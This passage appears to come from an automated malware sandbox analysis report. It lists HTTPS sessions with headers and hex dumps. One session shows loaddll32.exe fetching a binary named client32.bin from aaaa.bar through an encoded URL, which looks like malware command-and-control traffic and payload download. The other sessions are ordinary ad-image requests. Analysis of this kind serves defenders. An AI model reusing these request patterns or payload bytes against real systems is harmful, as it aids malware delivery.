41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              21192.168.2.54997231.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:24 UTC1716OUTGET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
                                                              2021-10-20 13:12:25 UTC1717INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:24 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 1849
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:25 UTC1717INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.549825172.217.168.38443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:50 UTC12OUTGET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: ad.doubleclick.net
                                                              Connection: Keep-Alive
                                                              Cookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
                                                              2021-10-20 13:08:50 UTC12INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Vary: Accept-Encoding
                                                              Content-Type: image/x-icon
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
                                                              Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
                                                              Content-Length: 1078
                                                              Date: Wed, 20 Oct 2021 12:04:13 GMT
                                                              Expires: Thu, 21 Oct 2021 12:04:13 GMT
                                                              Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                              X-Content-Type-Options: nosniff
                                                              Server: sffe
                                                              X-XSS-Protection: 0
                                                              Age: 3877
                                                              Cache-Control: public, max-age=86400
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                              Connection: close
                                                              2021-10-20 13:08:50 UTC13INData Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                              Data Ascii: (& N(
                                                              2021-10-20 13:08:50 UTC13INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.549834151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:55 UTC15OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC17INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 14430
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 593442488486134507491728786000581519378,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "44534c75f7eb3b79cde764316d4dc36c"
                                                              expiration: expiry-date="Mon, 11 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
                                                              last-modified: Fri, 10 Sep 2021 06:07:54 GMT
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 98
                                                              x-ratelimit-reset: 1
                                                              x-envoy-upstream-service-time: 68
                                                              X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb201
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:55 GMT
                                                              Via: 1.1 varnish
                                                              Age: 1729120
                                                              X-Served-By: cache-wdc5553-WDC, cache-mxp6949-MXP
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 1, 6
                                                              X-Timer: S1634735336.997005,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC18INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0f 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0f 30 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e5 00 01 00 01 00 03 00 0f 00 14 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 04 18 63 70 72 74 00 00 05 cc 00 00 00 23 77 74 70 74 00 00 05 f0 00 00 00 14 72 58 59 5a 00 00 06 04 00 00 00 14 67 58 59 5a 00 00 06 18 00 00 00 14 62 58 59 5a 00 00 06 2c 00 00 00 14 72
                                                              Data Ascii: JFIF@ICC_PROFILE0applmntrRGB XYZ acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZ,r
                                                              2021-10-20 13:08:56 UTC19INData Raw: 00 43 00 44 00 20 00 43 00 6f 00 6c 00 6f 00 72 00 69 00 64 00 6f 00 4b 00 6f 00 6c 00 6f 00 72 00 20 00 4c 00 43 00 44 03 88 03 b3 03 c7 03 c1 03 c9 03 bc 03 b7 00 20 03 bf 03 b8 03 cc 03 bd 03 b7 00 20 00 4c 00 43 00 44 00 46 00 e4 00 72 00 67 00 2d 00 4c 00 43 00 44 00 52 00 65 00 6e 00 6b 00 6c 00 69 00 20 00 4c 00 43 00 44 30 ab 30 e9 30 fc 00 4c 00 43 00 44 00 4c 00 43 00 44 00 20 00 61 00 20 00 43 00 6f 00 72 00 65 00 73 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 41 70 70 6c 65 20 49 6e 63 2e 2c 20 32 30 32 31 00 00 58 59 5a 20 00 00 00 00 00 00 f0 cf 00 01 00 00 00 01 19 11 58 59 5a 20 00 00 00 00 00 00 80 c2 00 00 3c 4b ff ff ff b9 58 59 5a 20 00 00 00 00 00 00 4e 49 00 00 b5 e8 00 00 0a e9 58 59 5a 20 00 00 00 00 00 00 27 cb 00 00 0d
                                                              Data Ascii: CD ColoridoKolor LCD LCDFrg-LCDRenkli LCD000LCDLCD a CorestextCopyright Apple Inc., 2021XYZ XYZ <KXYZ NIXYZ '
                                                              2021-10-20 13:08:56 UTC21INData Raw: 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46 22 46 67 46 ab 46 f0 47 35 47 7b 47 c0 48 05 48 4b 48 91 48 d7 49 1d 49 63 49 a9 49 f0 4a 37 4a 7d 4a c4 4b 0c 4b 53 4b 9a 4b e2 4c 2a 4c 72 4c ba 4d 02 4d 4a 4d 93 4d dc 4e 25 4e 6e 4e b7 4f 00 4f 49 4f 93 4f dd 50 27 50 71 50 bb 51 06 51 50 51 9b 51 e6 52 31 52 7c 52 c7 53 13 53 5f 53 aa 53 f6 54 42 54 8f 54 db 55 28 55 75 55 c2 56 0f 56 5c 56 a9 56 f7 57 44 57 92 57 e0 58 2f 58 7d 58 cb 59 1a 59 69 59 b8 5a 07 5a 56 5a a6 5a f5 5b 45 5b 95 5b e5 5c 35 5c 86 5c d6 5d 27 5d 78 5d c9 5e 1a 5e 6c 5e bd 5f 0f 5f 61 5f b3 60 05 60 57 60 aa 60 fc 61 4f 61 a2 61 f5 62 49 62 9c 62 f0 63 43 63 97 63 eb 64 40 64 94 64 e9 65 3d 65 92 65 e7 66
                                                              Data Ascii: @A)AjAAB0BrBBC:C}CDDGDDEEUEEF"FgFFG5G{GHHKHHIIcIIJ7J}JKKSKKL*LrLMMJMMN%NnNOOIOOP'PqPQQPQQR1R|RSS_SSTBTTU(UuUVV\VVWDWWX/X}XYYiYZZVZZ[E[[\5\\]']x]^^l^__a_``W``aOaabIbbcCccd@dde=eef
                                                              2021-10-20 13:08:56 UTC22INData Raw: da 00 0c 03 01 00 02 10 03 10 00 00 00 f7 4e 75 4b 16 50 d0 38 35 41 43 a2 1f 1e 87 93 43 df 64 df c9 57 69 0a c0 f9 b3 30 b5 99 a7 26 42 6b 8a ad 65 56 90 19 a9 d7 62 b7 28 e9 b6 2b 7a b6 bd 75 d2 71 cc 55 6c 6b a2 49 b8 89 2e ab 53 16 87 ac 3e 56 f8 22 db 01 3d 35 d9 2d ad 79 87 9a 28 b0 ba b2 ee b3 f2 aa 58 94 f1 a6 ae 73 e3 da 09 ea 36 38 ed 67 3f 5d e3 51 56 d2 21 be a7 17 59 20 e0 9c 57 5b ea 8b 7a ad 2c 8f 33 b2 8d 47 8b ea bd 51 98 ed 69 f3 36 15 93 2a fc cf cc 7d d3 c2 3a f8 59 19 b3 3a 78 1e 6a b9 97 57 12 69 ac c1 9a 6d e6 1f 79 cf d7 64 60 b9 6d 2b 7a fa 88 44 0c 81 1a 61 0e ee b6 ce b7 47 27 07 4b a3 a4 c4 f5 b0 66 f6 33 17 bb 97 97 d0 ce 68 1e 33 ed fe 60 f4 f9 2c a6 0f b7 26 7b 4e da 92 b4 15 72 c1 ba bd ce 4f 5f cd d7 2d cd 20 31 dd e3 a5
                                                              Data Ascii: NuKP85ACCdWi0&BkeVb(+zuqUlkI.S>V"=5-y(Xs68g?]QV!Y W[z,3GQi6*}:Y:xjWimyd`m+zDaG'Kf3h3`,&{NrO_- 1
                                                              2021-10-20 13:08:56 UTC24INData Raw: 65 2c 71 94 b9 b1 95 40 e3 a7 74 ce 47 8c 5d 90 ea 73 6a 01 32 b6 b7 24 25 d7 d8 d7 8d 23 db 7d 60 26 ef ae f1 6d f1 fb 46 23 16 be c7 c3 be a1 86 ce ac 12 22 b8 1f a5 5d 6d 94 9b e3 90 6b cc c2 3d 87 79 13 fc ec ac 63 e2 94 06 ee 06 88 7a fc db e8 b0 0d f5 60 30 5e c0 fb 6a 60 7d b8 3f 78 43 d2 de 39 bf bc 73 22 1a 68 f3 7a 43 1e a4 ac 33 fd e0 43 d7 3a 9f 79 22 75 6f a7 48 e6 52 08 e6 b4 66 75 f9 a3 cd 6d f8 c4 6c 15 4e bc 61 16 48 1d f9 0d 7e aa 9b 43 79 20 7e a6 1d 9f 96 55 53 62 7d 88 8a a2 6c 01 2f fd 22 00 22 79 1d 86 ba 9e 3b d1 40 17 51 8b 38 2d 88 16 81 c3 df e5 14 50 90 1b 0a d5 8c ee 3a 85 21 db f3 ec a0 f5 8d 40 ed 23 40 94 ce d9 cd 37 5e 3d ce 6b 4a 26 84 38 34 f6 01 05 3d 1f 4f 1f ac 31 90 7e b6 e3 1f 64 72 da 8d c7 72 53 3a 15 dd 6d 66 1b
                                                              Data Ascii: e,q@tG]sj2$%#}`&mF#"]mk=ycz`0^j`}?xC9s"hzC3C:y"uoHRfumlNaH~Cy ~USb}l/""y;@Q8-P:!@#@7^=kJ&84=O1~drrS:mf
                                                              2021-10-20 13:08:56 UTC25INData Raw: 8b d1 86 e3 b5 76 41 1e bf e9 e7 76 d7 26 6d a9 14 aa 06 d6 2d 14 22 79 d3 f2 36 11 21 2a c4 9c 86 2e b4 3b 75 17 d0 67 a0 18 d8 f6 a4 61 36 40 aa 1f ee c0 b3 d4 20 2a 18 ac be d1 d0 b0 49 45 0e 9f df 92 55 5d 97 a1 00 eb 19 35 2f b2 72 75 03 e8 31 3e f2 76 6a bc 9e 56 42 59 0e a6 da ec 46 05 85 ea 7e ad 3a 50 88 c4 59 ab a2 46 59 c0 50 10 fb ac 45 58 57 00 54 05 c2 85 58 e9 6d 99 8d 0a b2 49 16 55 89 04 60 2d d6 9d 7a 7d 60 54 5a fc 6c 7f f1 95 fd b9 70 d7 1b 62 fe 30 8b ca fa 15 3f a2 6f 26 3f 7e e7 7c 90 b5 9a c8 0c 9f 38 70 75 a5 59 c0 23 21 2e 07 ac 76 61 6a 11 63 b0 06 28 00 50 2a a4 39 38 a2 5a ee c4 b0 6a 00 7a 23 15 4f bf 65 45 0f 77 dc e2 fb 06 c0 27 b6 33 fd 8f ef 24 a9 d8 25 f2 e1 9b 51 18 a2 30 64 8e 8b c4 7d 96 c9 cd 5d 09 8d 9c 92 ae f1 fa
                                                              Data Ascii: vAv&m-"y6!*.;uga6@ *IEU]5/ru1>vjVBYF~:PYFYPEXWTXmIU`-z}`TZlpb0?o&?~|8puY#!.vajc(P*98Zjz#OeEw'3$%Q0d}]
                                                              2021-10-20 13:08:56 UTC26INData Raw: 56 00 9c 05 a9 7b 32 d5 5d 8f 59 21 ea 87 39 5d b5 8a 33 67 53 8f 93 6b 76 44 bf 3b 94 6e f9 40 81 22 d3 95 e1 e5 4c fd d7 ae c4 25 c8 48 fa 1a 39 08 55 26 b0 c7 6b 9b 9a b6 0d 66 b4 8d 13 15 6c 8e 40 54 7b d9 f4 f7 4d f4 41 c8 99 43 55 2f 75 18 29 9c 01 9f 64 fb 8c 1f b1 81 cf a0 4a 10 a4 86 c0 e0 7a ea a5 48 f7 96 48 26 d9 db af 72 ee 6b 36 24 34 de f8 d8 93 6b 73 6b 94 db 5f 0b b8 f8 d8 b7 e6 1b ae f3 79 44 a3 bb aa 7e b9 4e 78 97 2a bb a2 54 0e e8 be cb 62 1a 90 80 10 85 3d 49 78 d5 c1 cd bd 71 d8 90 ba ef 40 03 9b 1e ce 33 12 2e 87 ee 01 71 c3 9b 5c 23 a2 80 4f b2 d8 05 8f 59 fe 10 54 13 63 e4 b0 11 d5 88 55 31 9b 1e 82 fc 75 f9 28 0d dc de 3b e7 29 2c ef 14 d1 c1 9c ac 2f a7 e2 7a 7c 65 ef 4e 78 ee 27 4a 38 53 45 cc dc e7 20 e7 24 8c 1d dd 05 cf 1f
                                                              Data Ascii: V{2]Y!9]3gSkvD;n@"L%H9U&kfl@T{MACU/u)dJzHH&rk6$4ksk_yD~Nx*Tb=Ixq@3.q\#OYTcU1u(;),/z|eNx'J8SE $
                                                              2021-10-20 13:08:56 UTC28INData Raw: 05 05 00 00 00 00 00 00 00 01 02 00 03 11 04 10 21 31 41 12 20 13 22 42 51 05 33 61 71 72 23 24 32 52 81 ff da 00 08 01 03 01 01 3f 00 98 5c 30 1e 66 1a cf 0c 01 b6 92 b5 1e 9f 32 cb 03 c4 65 b1 c9 62 76 d2 17 a8 83 dc 88 9a 44 61 1d 45 cf b4 71 d0 c4 18 ed 92 c4 83 b3 0f f3 e9 fe 53 a1 5e 9e a2 74 b2 99 79 8a 1a 2b 42 72 58 90 67 b9 94 3e 75 3f c8 44 3f a6 23 42 45 ed 31 02 f4 db 21 16 26 83 33 95 02 05 6a 7f 90 89 f2 e3 42 2e 6f 1b 50 47 d2 32 da c6 01 29 8e 62 8c cc 0b 01 b1 06 51 7e a4 fb 8b ca a6 c2 2b 03 0d 8b 42 b7 ea 04 73 3a 6c 6d 14 69 16 5b 30 32 f8 7d 4b d1 51 c8 d2 62 09 b8 02 2a 1e 67 45 8c 23 ce dc 1d c4 65 8a 35 80 76 0c b0 0f 6a a5 7d c4 1a d4 26 11 08 95 16 f6 32 d0 08 3b 01 cb 0a d6 ae 9f 53 17 68 04 31 8c 30 76 0c b1 58 60 11 1e 98 e0
                                                              Data Ascii: !1A "BQ3aqr#$2R?\0f2ebvDaEqS^ty+BrXg>u?D?#BE1!&3jB.oPG2)bQ~+Bs:lmi[02}KQb*gE#e5vj}&2;Sh10vX`
                                                              2021-10-20 13:08:56 UTC29INData Raw: 88 40 30 97 b8 01 61 72 1a 33 bd 91 68 77 d6 ee dd 02 22 9d 3b 01 fa 91 0d 03 65 2a d1 7e 5d a7 ac 27 41 39 50 08 c4 d9 07 38 9d 21 a4 a9 7c 99 1b 0f 03 96 5e d4 35 83 a5 c3 b8 51 cc ae c8 68 aa 2e df ca ef fd f4 44 d3 69 fe e3 72 e6 77 ee 3a a6 81 f5 68 9b 3b bb 7a 15 a9 c5 ba b4 75 83 78 4c d5 83 04 d3 70 1f f6 a0 34 c6 a1 ac 39 d3 f6 54 dc c1 49 97 92 08 d5 78 32 a5 ef 98 07 a0 4d 2e 12 5c 76 01 5c 01 75 8e 56 b4 1e 56 26 02 00 38 22 db 74 90 7c 21 f0 76 e5 97 a2 c7 14 18 5d 6d 79 0a db 1e bf 82 1f a0 96 1e e2 f2 83 38 92 e9 a5 55 df 43 c6 0d 37 8c 27 d2 87 1d 74 8d e3 bb 50 0f 74 39 b3 f4 3f b8 ee 9f 4d d6 c9 b4 f5 0e 54 da e1 b6 b0 7f 89 54 8c e9 02 c4 e0 2f 59 d0 26 06 90 21 0d 6f 03 5e 8b 5b a4 a8 6b 6c 2d 6e 5b 00 82 2a d2 10 b0 10 10 89 b1 e8 51
                                                              Data Ascii: @0ar3hw";e*~]'A9P8!|^5Qh.Dirw:h;zuxLp49TIx2M.\v\uVV&8"t|!v]my8UC7'tPt9?MTT/Y&!o^[kl-n[*Q
                                                              2021-10-20 13:08:56 UTC30INData Raw: 20 a7 55 7f 05 48 3e 8b 77 aa 09 d2 d6 2e 0f 8e ac d7 12 de 1b 8a 6f af 49 8d 38 68 a5 d1 ab 87 e1 c9 1e ce 37 82 a4 58 58 7c 34 ca e0 38 f0 f1 34 f8 3e 32 ae b7 c0 d8 1b 3d a7 c8 5c 57 f4 e7 11 02 b8 1e b7 0c 7c 3d 8a 95 56 1c 3a 9b 83 80 45 dc 45 27 b6 bb 18 27 df a2 65 a9 cf e1 e8 54 7b 83 33 a7 d4 80 f6 f8 72 d4 78 76 7a d4 9e dc be 83 84 94 f8 3c 33 05 46 37 e9 73 58 d8 b8 50 d9 8e 72 7a 74 1d 57 b6 54 05 12 21 5d 48 dc 2f 6b 41 84 61 c2 14 ff 00 88 4f 93 16 26 c2 10 8f dc a8 e4 7d 1a 44 06 80 26 fb 12 a9 d4 81 76 35 de e9 77 6c d9 06 1e 1e 8b 69 33 8c a2 c9 c0 89 96 c3 9a aa 8e 05 97 a2 ce 20 c5 48 68 b9 95 5c 50 c1 6d 46 b2 bc 37 a0 f5 43 97 05 56 a5 46 ea 15 5b c2 0e 08 df bf 0c 58 b5 b4 38 06 b8 16 8a ad 07 79 b3 5c a9 3e 9f 1b 4d f5 9d 4d 8e 65
                                                              Data Ascii: UH>w.oI8h7XX|484>2=\W|=V:EE''eT{3rxvz<3F7sXPrztWT!]H/kAaO&}D&v5wli3 Hh\PmF7CVF[X8y\>MMe
                                                              2021-10-20 13:08:56 UTC32INData Raw: 8e 81 5e 16 ff 00 0a 1c 48 46 e2 42 8a bc 57 10 ca 24 f4 e1 e8 dd ff 00 72 14 53 a5 4d cf 7b fa 02 60 0f 25 0d 6c 61 a4 0e c1 d1 7f b4 ad 4f ad e8 d3 79 39 8b b9 1f 49 9c 1b 69 4f 70 e4 74 34 b9 83 b6 93 0b da 5f 85 31 ab 52 70 a7 58 86 13 b0 2e 2a 38 7a 66 1a 31 ea 39 06 32 a3 5c 5a 3b 04 3e 42 f6 bc 59 dd c7 e0 cf 29 e7 7e f8 2a 21 59 38 7c 27 1b d8 a1 3c 35 23 49 92 72 f7 15 a3 57 0a ee 26 b7 f1 4d 85 02 ff 00 44 3a a3 88 cd 5a c7 51 5a 9a d7 10 3b e8 11 a9 3a 2b 43 b4 f5 d0 ec a8 ff 00 8c ab 2d e8 a0 32 e0 0e 80 a3 ee 7d fb 82 88 70 69 2d f8 28 e8 78 e1 8b e9 6c 64 49 4c 7b 29 d0 06 94 8c 15 ef 0d 97 06 5a e5 7d 2e 0e 0b 6f f9 05 02 3a 20 9c 66 44 95 23 f4 a7 35 ae 73 b8 9e 2c 8d e1 c4 31 bf 25 1d 05 e1 c1 b1 8a 74 c4 34 7d d4 bc 92 f7 78 6b 07 fb 95
                                                              Data Ascii: ^HFBW$rSM{`%laOy9IiOpt4_1RpX.*8zf192\Z;>BY)~*!Y8|'<5#IrW&MD:ZQZ;:+C-2}pi-(xldIL{)Z}.o: fD#5s,1%t4}xk


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              5192.168.2.549835151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:55 UTC16OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC44INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 15784
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 584385527964933043724450997812708027208,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "ae4278f4943a7a8732926734e9e746f0"
                                                              last-modified: Wed, 29 Sep 2021 11:01:59 GMT
                                                              status: 200 OK
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 99
                                                              x-ratelimit-reset: 1
                                                              x-request-id: bc8b1e8468ddb53bcb1fe673cd3eb322
                                                              x-envoy-upstream-service-time: 65
                                                              X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb202
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Via: 1.1 varnish
                                                              Age: 1815419
                                                              X-Served-By: cache-wdc5546-WDC, cache-mxp6964-MXP
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 1, 1
                                                              X-Timer: S1634735336.999763,VS0,VE1
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg
                                                              X-vcl-time-ms: 1
